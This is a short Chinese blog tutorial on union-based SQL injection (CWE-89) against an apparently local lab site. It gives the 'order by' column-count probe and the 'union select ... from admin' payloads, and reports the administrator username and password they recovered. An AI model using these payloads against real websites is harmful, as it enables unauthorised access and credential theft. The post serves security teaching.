【软件安全】cwe-89 SQL Injection(二)

联合查询注入技术:
    首先,在链接后面添加语句【order by 11(数字任意)】,根据页面返回结果,来判断站点中的字段数目。

    然后,在链接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin(表名)】,进行联合查询,来暴露可查询的字段编号。

最后,根据上一步得到的字段编号,添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,直接暴露管理员用户名和密码。

 

一、检测字段长度

1.1随便点击一个链接【`http://192.168.1.3:8008/onews.asp?id=45`】,在后面添加语句【order by 11】,页面显示正常。

【软件安全】cwe-89 SQL Injection(二)

1.2同样添加语句【order by 12】页面报错,所以此站字段长度为11

【软件安全】cwe-89 SQL Injection(二)

二、暴管理员用户、密码

2.1在连接后面添加语句【union select 1,2,3,4,5,6,7,8,9,10,11 from admin】,页面显示数字23

【软件安全】cwe-89 SQL Injection(二)

2.2在连接后面添加语句【union select 1,admin,password,4,5,6,7,8,9,10,11 from admin】,即可暴出管理员用户名和密码。【软件安全】cwe-89 SQL Injection(二)

2.3到此,即可知道管理员用户名【admin】和密码【bfpms】。


最后,欢迎大家到我的个人主页点击打开链接一起交流、学习~